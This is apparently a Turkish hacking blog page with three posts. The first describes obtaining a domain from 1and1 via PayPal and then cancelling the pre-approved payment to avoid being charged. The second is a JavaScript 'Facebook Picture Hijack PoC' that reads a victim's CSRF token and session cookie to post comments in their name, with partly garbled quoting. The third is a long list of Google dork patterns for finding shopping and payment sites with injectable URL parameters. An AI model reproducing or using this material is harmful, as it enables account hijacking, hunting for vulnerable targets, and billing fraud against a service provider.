-
11 Mayıs 2015 Pazartesi
no image

Öncelikle bana destek olmak için sitemdeki reklamlara tıklamanızı rica ediyorum. Domain aldıktan sonra en sondaki işlemi yapıp önceden onaylı ödemeyi iptal etmeniz gerekmekte. Bu sayede 1and1 sizden ücret tahsis edemiyor.

1and_005
1and_006
2-) Continue diyip 3. adıma geçiyoruz
1and_007
3-) Burdada continue diyoruz :)
4-) Continue dedikten sonra karşımıza login alanı ve yeni üyelik oluşturma alanı çıkıyor yeni üyelik diyoruz. Üyelikte örnek olarak nasıl doldururdugunuda atıyorum belki yapamayan arkadaşlar olabilir.
1and_009
1and_010

Üyeligimizi açtıktan sonra ödeme kısmına geliyoruz Paypal ı seçiyoruz
1and_011
Go to paypal diyip paypal a login oluyoruz
1and_012
1and_013
1and_014

Ve order now diyoruz domainimiz hayırlı olsun sıradaki aşama çok önemli domaini aldık diye onu unutursanız paypalımızdan para çekebiliyor

1and_016
Önceden onaylı ödemelere girip 1AND1 internet ınc in üctüne tıklayıp önceden onaylı ödemeyi iptal ediyoruz.
Hayırlı olsun ücretsiz domaininizi aldınız :) bana destek olmak için sitemden reklama tıklıyabilir ve  Hostinger referansım üzerinden ücretsiz hosting alabilirsiniz .
DEVAMINI OKU..
no image

-----Javascript Facebook Picture Hijack PoC----

var yourMessage = "check out my pic"; // your msg
var photofbID = XXXXXXXXXX; // victim photo ID
var statuslinkID = XXXXXXXXXX ; //status ID where to comment with hijack

function generatePhstamp(b, g) {
var f = b.length;
numeric_csrf_value = --;
for (var c = 0; c < g.length; c++) {
numeric_csrf_value += g.charCodeAt©
}
return '1' + numeric_csrf_value + f
}
var e = document.getElementsByName('fb_dtsg')[0].value,
c = document.cookie.split('c_user=-)[1].split(-;-)[0],
h = "ft_ent_identifier=-+statuslinkID+-&comment_text=-+yourMessage +-&source=1&client_id=1371674471412:1000847939&attached_photo_fbid=-+photofbID+-&rootid=u_ps_0_0_m&ft[tn]=[]&ft[qid]=5891294842807711448&ft[mf_story_key]:-2575904214724011317&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user=- + c + -&__a=1&__dyn=7n8aD5z5CF-&__req=1r&fb_dtsg=- + e;
m = generatePhstamp(h, e);
h += -&phstamp=- + m;
picture = new XMLHttpRequest();
picture.open("POST", "https://www.facebook.com/ajax/ufi/add_comment.php", true);
picture.setRequestHeader("Content-type", "application/x-javascript; charset=utf-8");
picture.send(h);
console.log("The pic has been Hijacked & posted at http://facebook.com/-+statuslinkID);


Video
DEVAMINI OKU..
no image

cat.asp?cat
 productlist.asp?catalogid
 Category.asp?category_id
 Category.cfm?category_id
 category.asp?cid
 category.cfm?cid
 category.asp?cat
 category.cfm?cat
 category.asp?id
 index.cfm?pageid
 category.asp?catid
 Category.asp?c
 Category.cfm?c
 productlist.cfm?catalogid
 productlist.asp?catalogid
 viewitem.asp?catalogid
 viewitem.cfm?catalogid
 catalog.cfm?catalogId
 catalog.asp?catalogId
 department.cfm?dept
 department.asp?dept
 itemdetails.cfm?catalogId
 itemdetails.asp?catalogId
 product_detail.asp?catalogid
 product_detail.cfm?catalogid
 product_list.asp?catalogid
 product_list.cfm?catalogid
 ShowProduct.cfm?CatID
 ShowProduct.asp?CatID
 search_results.cfm?txtsearchParamCat
 search_results.asp?txtsearchParamCat
 itemdetails.cfm?catalogId
 itemdetails.asp?catalogId
 store-page.cfm?go
 store-page.asp?go
 Detail.cfm?CatalogID
 Detail.asp?CatalogID
 browse.cfm?category_id
 view.cfm?category_id
 products.cfm?category_id
 index.cfm?Category_ID
 detail.cfm?id
 category.cfm?id
 showitems.cfm?category_id
 ViewProduct.asp?PID
 ViewProduct.cfm?PID
 shopdisplayproducts.asp?catalogid
 shopdisplayproducts.cfn?catalogid
 displayproducts.cfm?category_id
 displayproducts.asp?category_id
 DisplayProducts.asp?prodcat
 DisplayProducts.cfm?prodcat=
 productDetail.cfm?ProductID
 products.php?subcat_id
 showitem.cfm?id=21 
 productdetail.cfm?pid
 default.cfm?action=46 
 products_accessories.asp?CatId
 Store_ViewProducts.asp?Cat
 category.cfm?categoryID
 category.asp?category
 tepeecart.cfm?shopid
 view_product.asp?productID
 ProductDetails.asp?prdId=12 
 products.cfm?ID
 detail.asp?product_id
 product_detail.asp?product_id
 products.php?subcat_id
 product.php?product_id
 view_product.cfm?productID
 product_details.asp?prodid
 shopdisplayproducts.cfm?id
 displayproducts.cfm?id=about.php?cartID=accinfo.php?cartId=acclogin.php?cartID=add_cart.php?num=addcart.php?add-to-cart.php?ID=addToCart.php?idProduct=buy.php?bookid=cardinfo.php?card=cart.php?cart_id=cart_additem.php?id=cart_validate.php?id=cartadd.php?id=checkout.php?cartid=YZboard/view.php?id="buy.asp?bookid=-
"cardinfo.asp?card=-"cart.asp?cart_id=-
"cart.asp?id=-buy.php?bookid=add_cart.php?num=add-to-cart.php?ID=shopping.php?id=shop_category.php?id=inurl:-.php?cat=-+intext:"Paypal"+site:UK (istediğniz ülke domain uzantısını yazabilirsiniz )inurl:-.php?cat=-+intext:-/Buy Now/-+site:.net
inurl:-.php?cid=-+intext:"online+betting"inurl:-.php?id=- intext:"View cart"inurl:-.php?id=- intext:"Buy Now"inurl:-.php?id=- intext:"add to cart"inurl:-.php?id=- intext:"shopping"inurl:-.php?id=- intext:"boutique"inurl:-.php?id=- intext:-/store/-inurl:-.php?id=- intext:-/shop/-inurl:-.php?id=- intext:"toys"inurl:-.php?cid=-
checkout.asp?UserID=checkout.asp?cartid=checkout.cfm?UserID=checkout.cfm?cartid=checkout.php?UserID=checkout.php?cartid=checkout1.asp?cartid=checkout1.cfm?cartid=checkout1.php?cartid=db/CART/product_details.php?product_id=db/CART/product_details.asp?product_id=eshop.php?id=estore/products.php?cat=giftshop/product.php?proid
DEVAMINI OKU..
Kaydol: Yorumlar ( Atom )